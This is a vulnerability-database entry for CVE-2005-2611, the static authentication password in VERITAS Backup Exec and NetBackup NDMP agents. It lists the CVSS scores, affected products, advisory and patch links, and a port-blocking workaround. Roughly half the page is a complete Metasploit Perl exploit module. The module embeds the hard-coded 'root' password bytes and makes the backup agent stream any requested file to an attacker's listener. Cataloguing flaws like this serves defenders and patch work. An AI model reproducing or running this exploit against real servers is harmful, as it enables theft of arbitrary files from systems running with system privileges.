CVE-2005-2611
CVSS 10.0
Published: 2005-08-17 00:00:00
Revised: 2011-03-07 21:24:46

[Original] VERITAS Backup Exec for Windows Servers 8.6 through 10.0, Backup Exec for NetWare Servers 9.0 and 9.1, and NetBackup for NetWare Media Server Option 4.5 through 5.1 uses a static password during authentication from the NDMP agent to the server, which allows remote attackers to read and write arbitrary files with the backup server.


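[CNNVD] VERITAS Backup Exec Remote Agent arbitrary file download vulnerability (CNNVD-200508-183)

        VERITAS Backup Exec Remote Agent is a data backup and recovery solution that supports the Network Data Management Protocol (NDMP).
        VERITAS Backup Exec Remote Agent uses hard-coded administrative authentication credentials (a root password), which remote attackers may exploit to access system files. An attacker who knows these credentials and can reach the Remote Agent can retrieve arbitrary files from a vulnerable system. The Remote Agent runs with system privileges.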

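- CVSS (base score)

CVSS score: 10 [Severe (HIGH)]
Confidentiality impact: COMPLETE [complete information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system outage]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: NETWORK [the attacker needs neither internal network access nor local access]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)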

cpe:/a:symantec_veritas:netbackup:netware_media_servers_4.5_mp1
cpe:/a:symantec_veritas:backup_exec:windows_servers_10.0_rev._5520
cpe:/a:symantec_veritas:backup_exec:windows_servers_10.0_rev._5484_sp1
cpe:/a:symantec_veritas:backup_exec_remote_agent:windows_server
cpe:/a:symantec_veritas:backup_exec:netware_servers_9.1.1152_.4
cpe:/a:symantec_veritas:netbackup:netware_media_servers_5.0_mp3
cpe:/a:symantec_veritas:netbackup:netware_media_servers_4.5_mp2
cpe:/a:symantec_veritas:backup_exec:netware_servers_9.0.4172
cpe:/a:symantec_veritas:netbackup:netware_media_servers_5.0_mp5
cpe:/a:symantec_veritas:netbackup:netware_media_servers_4.5_mp8
cpe:/a:symantec_veritas:backup_exec:windows_servers_9.0_rev._4454
cpe:/a:symantec_veritas:backup_exec:netware_servers_9.1.1151_.1
cpe:/a:symantec_veritas:backup_exec:windows_servers_9.0_rev._4367
cpe:/a:symantec_veritas:backup_exec:netware_servers_9.1.1127_.1
cpe:/a:symantec_veritas:netbackup:netware_media_servers_4.5_fp4
cpe:/a:symantec_veritas:backup_exec:netware_servers_9.1.306
cpe:/a:symantec_veritas:backup_exec:netware_servers_9.1.307
cpe:/a:symantec_veritas:backup_exec_remote_agent:netware_server
cpe:/a:symantec_veritas:netbackup:netware_media_servers_4.5_fp6
cpe:/a:symantec_veritas:netbackup:netware_media_servers_4.5_fp8
cpe:/a:symantec_veritas:netbackup:netware_media_servers_5.0_mp4
cpe:/a:symantec_veritas:netbackup:netware_media_servers_4.5_fp2
cpe:/a:symantec_veritas:netbackup:netware_media_servers_5.1_mp2
cpe:/a:symantec_veritas:netbackup:netware_media_servers_4.5_mp6
cpe:/a:symantec_veritas:netbackup:netware_media_servers_4.5_fp5
cpe:/a:symantec_veritas:netbackup:netware_media_servers_5.0
cpe:/a:symantec_veritas:netbackup:netware_media_servers_5.0_mp2
cpe:/a:symantec_veritas:backup_exec:windows_servers_9.0_rev._4367_sp1
cpe:/a:symantec_veritas:backup_exec:windows_servers_9.0_rev._4454_sp1
cpe:/a:symantec_veritas:netbackup:netware_media_servers_4.5_mp5
cpe:/a:symantec_veritas:backup_exec:netware_servers_9.0.4019
cpe:/a:symantec_veritas:netbackup:netware_media_servers_4.5
cpe:/a:symantec_veritas:backup_exec:netware_servers_9.0.4174
cpe:/a:symantec_veritas:netbackup:netware_media_servers_5.0_mp1
cpe:/a:symantec_veritas:netbackup:netware_media_servers_5.1_mp1
cpe:/a:symantec_veritas:backup_exec:netware_servers_9.0.4202
cpe:/a:symantec_veritas:backup_exec:netware_servers_9.1.1067_.2
cpe:/a:symantec_veritas:netbackup:netware_media_servers_4.5_mp7
cpe:/a:symantec_veritas:backup_exec:netware_servers_9.1.1067_.3
cpe:/a:symantec_veritas:backup_exec:netware_servers_9.1.1156
cpe:/a:symantec_veritas:backup_exec:netware_servers_9.0.4170
cpe:/a:symantec_veritas:netbackup:netware_media_servers_4.5_fp1
cpe:/a:symantec_veritas:backup_exec:windows_servers_9.0
cpe:/a:symantec_veritas:backup_exec:windows_servers_9.1
cpe:/a:symantec_veritas:backup_exec:netware_servers_9.1.1152
cpe:/a:symantec_veritas:netbackup:netware_media_servers_4.5_fp3
cpe:/a:symantec_veritas:backup_exec:windows_servers_9.1_rev._4691_sp2
cpe:/a:symantec_veritas:backup_exec:windows_servers_9.1_rev._4691
cpe:/a:symantec_veritas:backup_exec:windows_servers_10.0_rev._5484
cpe:/a:symantec_veritas:backup_exec:netware_servers_9.1.1154
cpe:/a:symantec_veritas:netbackup:netware_media_servers_4.5_fp7
cpe:/a:symantec_veritas:netbackup:netware_media_servers_5.1
cpe:/a:symantec_veritas:netbackup:netware_media_servers_4.5_mp3
cpe:/a:symantec_veritas:netbackup:netware_media_servers_4.5_mp4
cpe:/a:symantec_veritas:backup_exec:windows_servers_8.6
cpe:/a:symantec_veritas:netbackup:netware_media_servers_5.1_mp3
cpe:/a:symantec_veritas:backup_exec_remote_agent:unix_linux_server

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2611
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2611
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200508-183
(Official data source) CNNVD

- Other links and resources

http://www.kb.cert.org/vuls/id/378957
(VENDOR_ADVISORY)  CERT-VN  VU#378957
http://www.us-cert.gov/cas/techalerts/TA05-224A.html
(VENDOR_ADVISORY)  CERT  TA05-224A
http://xforce.iss.net/xforce/xfdb/21793
(PATCH)  XF  backupexec-ndmp-gain-access(21793)
http://securitytracker.com/id?1014662
(VENDOR_ADVISORY)  SECTRACK  1014662
http://securityresponse.symantec.com/avcenter/security/Content/2005.08.12b.html
(VENDOR_ADVISORY)  CONFIRM  http://securityresponse.symantec.com/avcenter/security/Content/2005.08.12b.html
http://secunia.com/advisories/16403
(VENDOR_ADVISORY)  SECUNIA  16403
http://www.vupen.com/english/advisories/2005/1387
(UNKNOWN)  VUPEN  ADV-2005-1387
http://www.securityfocus.com/bid/14551
(UNKNOWN)  BID  14551

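- Vulnerability information

VERITAS Backup Exec Remote Agent arbitrary file download vulnerability
Critical  Access validation error
2005-08-17 00:00:00 2007-08-20 00:00:00
Remote
        VERITAS Backup Exec Remote Agent is a data backup and recovery solution that supports the Network Data Management Protocol (NDMP).
        VERITAS Backup Exec Remote Agent uses hard-coded administrative authentication credentials (a root password), which remote attackers may exploit to access system files. An attacker who knows these credentials and can reach the Remote Agent can retrieve arbitrary files from a vulnerable system. The Remote Agent runs with system privileges.

- Advisories and patches

        The vendor has released upgrade patches to fix this security issue. Patch download links:
        http://support.veritas.com/docs/278434
        http://support.veritas.com/docs/278431
        http://support.veritas.com/docs/278430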

- Vulnerability information (1147)

Veritas Backup Exec Remote File Access Exploit (windows) (EDBID:1147)
windows remote
2005-08-11 Verified
10000 n/a
N/A
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

##
# Original code written by <CENSORED> and ported to the Framework by HDM
##

package Msf::Exploit::backupexec_dump;
use base "Msf::Exploit";
use strict;
use Pex::Text;
use IO::Socket;
use IO::Select;

my $advanced = { };

my $info =
  {
	'Name'  	=> 'Veritas Backup Exec Windows Remote File Access',
	'Version'  	=> '$Revision: 1.3 $',
	'Authors' 	=> [ 'anonymous' ],
	'Arch'  	=> [ ],
	'OS'    	=> [ ],

	'UserOpts'	=>
	  {
		'RHOST' => [1, 'ADDR', 'The target IP address'],
		'RPORT' => [1, 'PORT', 'The target NDMP port', 10000],
		'RPATH' => [0, 'DATA', 'The remote file path to obtain'],
		
		'LHOST' => [1, 'ADDR', 'The local IP address', '0.0.0.0'],
		'LPORT' => [1, 'PORT', 'The local listner port', 44444],
		'LPATH' => [0, 'DATA', 'The local backup file path'],
	  },

	'Description'  => Pex::Text::Freeform(qq{
	This module abuses a logic flaw in the Backup Exec Windows Agent to download
arbitrary files from the system. This flaw was found by someone who wishes to
remain anonymous and affects all known versions of the Backup Exec Windows Agent. The 
output file is in 'MTF' format, which can be extracted by the 'NTKBUp' program 
listed in the references section.
}),

	'Refs' =>
	  [
	  	['BID', '14551'],
		['URL', 'http://www.fpns.net/willy/msbksrc.lzh'],
		# ['URL', 'http://metasploit.com/tools/msbksrc.tar.gz'],
	  ],

	'DefaultTarget' => 0,
	'Targets' =>
	  [
		['Veritas Remote File Access'],
	  ],

	'Keys' => ['veritas'],
  };

sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
	return($self);
}

sub Check {
	my $self        = shift;
	my $remote_host = $self->GetVar('RHOST');
	my $remote_port = $self->GetVar('RPORT');

	my $s = Msf::Socket::Tcp->new(
		'PeerAddr'  => $remote_host,
		'PeerPort'  => $remote_port,
		'SSL'       => $self->GetVar('SSL'),
	  );

	if ( $s->IsError ) {
		$self->PrintLine( '[*] Error connecting to Veritas agent: ' . $s->GetError );
		return $self->CheckCode('Connect');
	}

	my $res;
	my $pkt;
	
	$res = $self->AgentRead($s);
	if (! $res) {
		$self->PrintLine('[*] Did not receive greeting from the agent');
		$s->Close;
		return $self->CheckCode('Unknown');
	}

	my $username = "root";
	my $password = "\xb4\xb8\x0f\x26\x20\x5c\x42\x34\x03\xfc\xae\xee\x8f\x91\x3d\x6f"; 

	# Create the CONNECT_CLIENT_AUTH request
	$pkt =
	  pack('N', 1).
	  pack('N', time()).
	  pack('N', 0).
	  pack('N', 0x0901).
	  pack('N', 0).
	  pack('N', 0).
	  pack('N', 2).
	  pack('N', length($username)).
	  $username.
	  $password;

	$self->PrintLine( "[*] Sending magic authentication request...");
	
	$self->AgentSend($s, $pkt);
	$res = $self->AgentRead($s);
	$s->Close;
	
	if (! $res) {
		$self->PrintLine('[*] Did not receive authentication response');
		return $self->CheckCode('Safe');	
	}

	my @words = unpack('N*', $res);
	
	if (
		$words[2] == 1 && 
		$words[3] == 0x0901 &&
	 	$words[5] == 0 &&
	  	$words[6] == 0
	   ) {
		$self->PrintLine('[*] This system appears to be vulnerable');
		return $self->CheckCode('Appears');
	}
	
	$self->PrintLine('[*] This system does not appear to be vulnerable');
	return $self->CheckCode('Safe');
}

sub Exploit {
	my $self        = shift;
	my $remote_host = $self->GetVar('RHOST');
	my $remote_port = $self->GetVar('RPORT');
	my $remote_path = $self->GetVar('RPATH');

	my $local_host  = $self->GetVar('LHOST');
	my $local_port  = $self->GetVar('LPORT');
	my $local_path  = $self->GetVar('LPATH');
	
	
	if (! $local_path) {
		$self->PrintLine("[*] Please specify a local file name for the LPATH option");
		return;
	}

	if (! $remote_path) {
		$self->PrintLine("[*] Please specify a remote file path for the RPATH option");
		return;
	}
		
	$self->PrintLine( "[*] Attempting to retrieve $remote_path...");

	my $s = Msf::Socket::Tcp->new(
		'PeerAddr'  => $remote_host,
		'PeerPort'  => $remote_port,
		'SSL'       => $self->GetVar('SSL'),
	  );

	if ( $s->IsError ) {
		$self->PrintLine( '[*] Error connecting to Veritas agent: ' . $s->GetError );
		return;
	}

	my $res;
	my $pkt;
	
	$res = $self->AgentRead($s);
	if (! $res) {
		$self->PrintLine('[*] Did not receive greeting from the agent');
		$s->Close;
		return;
	}

	my $username = "root";
	my $password = "\xb4\xb8\x0f\x26\x20\x5c\x42\x34\x03\xfc\xae\xee\x8f\x91\x3d\x6f"; 

	# Create the CONNECT_CLIENT_AUTH request
	$pkt =
	  pack('N', 1).
	  pack('N', time()).
	  pack('N', 0).
	  pack('N', 0x0901).
	  pack('N', 0).
	  pack('N', 0).
	  pack('N', 2).
	  pack('N', length($username)).
	  $username.
	  $password;

	$self->PrintLine( "[*] Sending magic authentication request...");
	
	$self->AgentSend($s, $pkt);
	$res = $self->AgentRead($s);
	if (! $res) {
		$self->PrintLine('[*] Did not receive authentication response');
		return;
	}

	$self->PrintLine("[*] Starting the data connection listener on $local_port...");
	my $l = IO::Socket::INET->new
	  (
		'LocalPort' => $local_port,
		'Proto'     => 'tcp',
		'ReuseAddr' => 1,
		'Listen'    => 5,
		'Blocking'  => 0,
	  );
	
	if (! $l) {
		$self->PrintLine("[*] Failed to start the listener: $!");
		return;
	}
	
	my $sel = IO::Select->new($l);
	
	if ($local_host eq "0.0.0.0") {
		$local_host = $s->Socket->sockhost;
	}
	
	# Create the DATA_CONNECT request
	$pkt =
		pack('NNNNNNN',
			3,
			0,
			0,
			0x040a,
			0,
			0,
			1
		).
		gethostbyname($local_host).
		pack('N', $local_port);
		
	$self->PrintLine("[*] Directing the server to $local_host:$local_port...");
	
	$self->AgentSend($s, $pkt);
	$res = $self->AgentRead($s);
	if (! $res) {
		$self->PrintLine('[*] Did not receive data connect response');
		return;
	}

	$self->PrintLine("[*] Waiting 15 seconds for the agent to connect...");
	my @rdy = $sel->can_read(15);
	if (! @rdy) {
		$self->PrintLine("[*] No connection received from the agent :-(");
		return;
	}
	
	my $cli = $l->accept();
	if (! $cli) {
		$self->PrintLine("[*] Encountered an error accepting the connection: $!");
		return;
	}
	
	my $d = Msf::Socket::Tcp->new_from_socket($cli);
	
	$self->PrintLine("[*] Connection received from ".$d->PeerAddr." :-)");
	
	# Create the MOVER_SET_RECORD_SIZE request
	$pkt= 
		pack('NNNNNNN',
			4,
			0,
			0,
			0x0a08,
			0,
			0,
			0x8000,
		);
		
	$self->AgentSend($s, $pkt);
	$res = $self->AgentRead($s);
	if (! $res) {
		$self->PrintLine('[*] Did not receive mover set response');
		return;
	}

	# The environment needed to perform the actual backup
	my %define_env =
	(
		'USERNAME'                => '',
		'BU_EXCLUDE_ACTIVE_FILES' => "0",
		'FILESYSTEM'              => "\"\\\\$remote_host\\$remote_path\",v0,t0,l0,n0,f0",
	);

	# Create the DATA_START_BACKUP request
	$pkt =
		pack('NNNNNNN',
			5,
			0,
			0,
			0x0401,
			0,
			0,
			4,
		).
		"dump".
		pack("N", scalar(keys %define_env));
	
	foreach my $var (keys %define_env) {
		
		$pkt .= pack("N", length($var));
		$pkt .= $var;
		if (length($var) % 4) {
			$pkt .= "\x00" x (4 - (length($var) % 4));
		}
		
		$pkt .= pack("N", length($define_env{$var}));
		$pkt .= $define_env{$var};
		if (length($define_env{$var}) % 4) {
			$pkt .= "\x00" x (4 - (length($define_env{$var}) % 4));
		}
	}	

	substr($pkt, -1, 1) = "\x01";
	
	$self->AgentSend($s, $pkt);
	$res = $self->AgentRead($s);
	if (! $res) {
		$self->PrintLine('[*] Did not receive backup start response');
		return;
	}

	# Create the GET_ENV request
	$pkt =
		pack('NNNNNN',
			5,
			0,
			0,
			0x4004,
			0,
			0,
		);

	$self->AgentSend($s, $pkt);
	$res = $self->AgentRead($s);
	if (! $res) {
		$self->PrintLine('[*] Did not receive get env response');
		return;
	}

	if (! open(TMP, ">". $local_path)) {
		$self->PrintLine("[*] Could not open local file for writing: $!");
		return;
	}
	
	my $data;
	do 
	{
		$data = $d->Recv(524288, 10);
		if ($data) {
			$self->PrintLine("[*] Obtained ".length($data)." bytes from the agent");
			print TMP $data;
		}
		else {
			$self->PrintLine("[*] Reached the end of the backup data");
		}
		
	} while ($data);
	close(TMP);
			
	return;
};

sub AgentRead {
	my $self = shift;
	my $sock = shift;
	my $rlen = $sock->Recv(4, 10);
	return if ! $rlen;
	
	my $plen = unpack('N', $rlen);
	return if ! $plen;
	
	my $data = $sock->Recv($plen & 0x7fffffff, 10);
	return $data;
}

sub AgentSend {
	my $self = shift;
	my $sock = shift;
	my $data = shift;
	return if ! $data;
	return $sock->Send(pack('N', 0x80000000 + length($data)) . $data);
}

1;

# milw0rm.com [2005-08-11]
		

- Vulnerability information

18695
VERITAS Backup Exec Remote Agent Static Password Arbitrary File Download
Remote / Network Access Authentication Management
Loss of Confidentiality
Exploit Public

- Vulnerability description

Veritas Backup Exec for Windows Servers contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when a remote user sends a CONNECT_CLIENT_AUTH request with a hardcoded password value to trigger the flaw. If successful, the flaw will disclose arbitrary files that are accessible via the Windows system account, resulting in a loss of confidentiality.

- Timeline

2005-08-12 Unknown
Unknown Unknown

- Solution

Currently, there are no known upgrades or patches to correct this issue for the Backup Exec Windows Server 8.6 version. For all affected versions, it is possible to correct the flaw by implementing the following workaround(s): Block external access to the service (TCP port 10000) at the network perimeter. For Backup Exec for Windows Servers 9.0, 9.1, & 10.0, Backup Exec for Netware Servers 9.1, and Netbackup for Netware Media Servers Option 4.5, 4.5 FP, 5.0, & 5.1, Veritas has released a patch to address this vulnerability.

- Related references

- Vulnerability author

Unknown or Incomplete
 

 
